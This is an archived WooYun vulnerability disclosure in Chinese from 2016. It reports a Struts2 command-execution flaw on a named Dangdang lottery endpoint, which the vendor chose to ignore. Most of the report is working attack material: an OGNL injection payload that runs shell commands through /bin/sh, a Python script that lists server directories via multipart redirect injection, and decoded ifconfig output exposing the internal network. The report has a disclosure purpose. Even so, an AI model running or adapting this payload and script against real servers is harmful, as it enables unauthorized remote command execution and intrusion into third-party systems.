乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-07-11: 细节已通知厂商并且等待厂商处理中 2016-07-11: 厂商已查看当前漏洞内容,细节仅向厂商公开 2016-07-16: 厂商已经主动忽略漏洞,细节向公众公开
神器在手,天下我有。
从TangScan提交插件赚取汤圆购买了另一个插件,扫到当当一个站点的Struts2命令执行:
漏洞地址:http://caipiao.dangdang.com/cbportal/usercenter/hemai.htm此处应有防护或过滤,之前的Payload都不好使了。测试Payload:
列目录:
执行命令:
ifconfig的结果解码后:
eth0 Link encap:Ethernet HWaddr 90:B1:1C:4C:A9:F2 inet addr:192.168.1.203 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::92b1:1cff:fe4c:a9f2/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:3425084210 errors:0 dropped:15 overruns:0 frame:4604 TX packets:2920393573 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:2642679068898 (2.4 TiB) TX bytes:1537753012738 (1.3 TiB) Interrupt:194 Memory:d91a0000-d91b0000 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:910780964 errors:0 dropped:0 overruns:0 frame:0 TX packets:910780964 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:484110986527 (450.8 GiB) TX bytes:484110986527 (450.8 GiB)virbr0 Link encap:Ethernet HWaddr 00:00:00:00:00:00 inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:26 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:4022 (3.9 KiB)
证实漏洞存在,不再深入,执行命令的Payload附在下面:
${"~["+new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.ProcessBuilder(new java.lang.String[]{'/bin/sh','-c','ifconfig|base64 -w 0'}).start().getInputStream())).readLine()+"]~"}
列目录脚本:
#! /usr/bin/env python# -*- coding: utf-8 -*-import reimport base64import requests path = '/usr/local/bea/'#要读取的路径url = "http://caipiao.dangdang.com/cbportal/usercenter/hemai.htm"#漏洞URLdata = """--289b3f46292c4eee95g3f64e37d6f4dc\r\nContent-Disposition: form-data; name="redirect:/${"~["+new java.io.File("%s").listFiles()[%s]+"]~"}"\r\n\r\n10498\r\n--289b3f46292c4eee95g3f64e37d6f4dc--"""try: headers = { 'Content-Type': 'multipart/form-data; boundary=289b3f46292c4eee95g3f64e37d6f4dc', 'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9' } for x in range(0, 400): response = requests.post(url, data = data % (path, str(x)), headers=headers, timeout=5, verify=False, allow_redirects=False) result = re.findall(r'~\[(.*?)\]~', response.content, re.S|re.I) if len(result) !=0: print(result[0]) else: print("Result End.....") breakexcept Exception, e: print(str(e))
升级
危害等级:无影响厂商忽略
忽略时间:2016-07-16 18:30
漏洞Rank:15 (WooYun评价)
暂无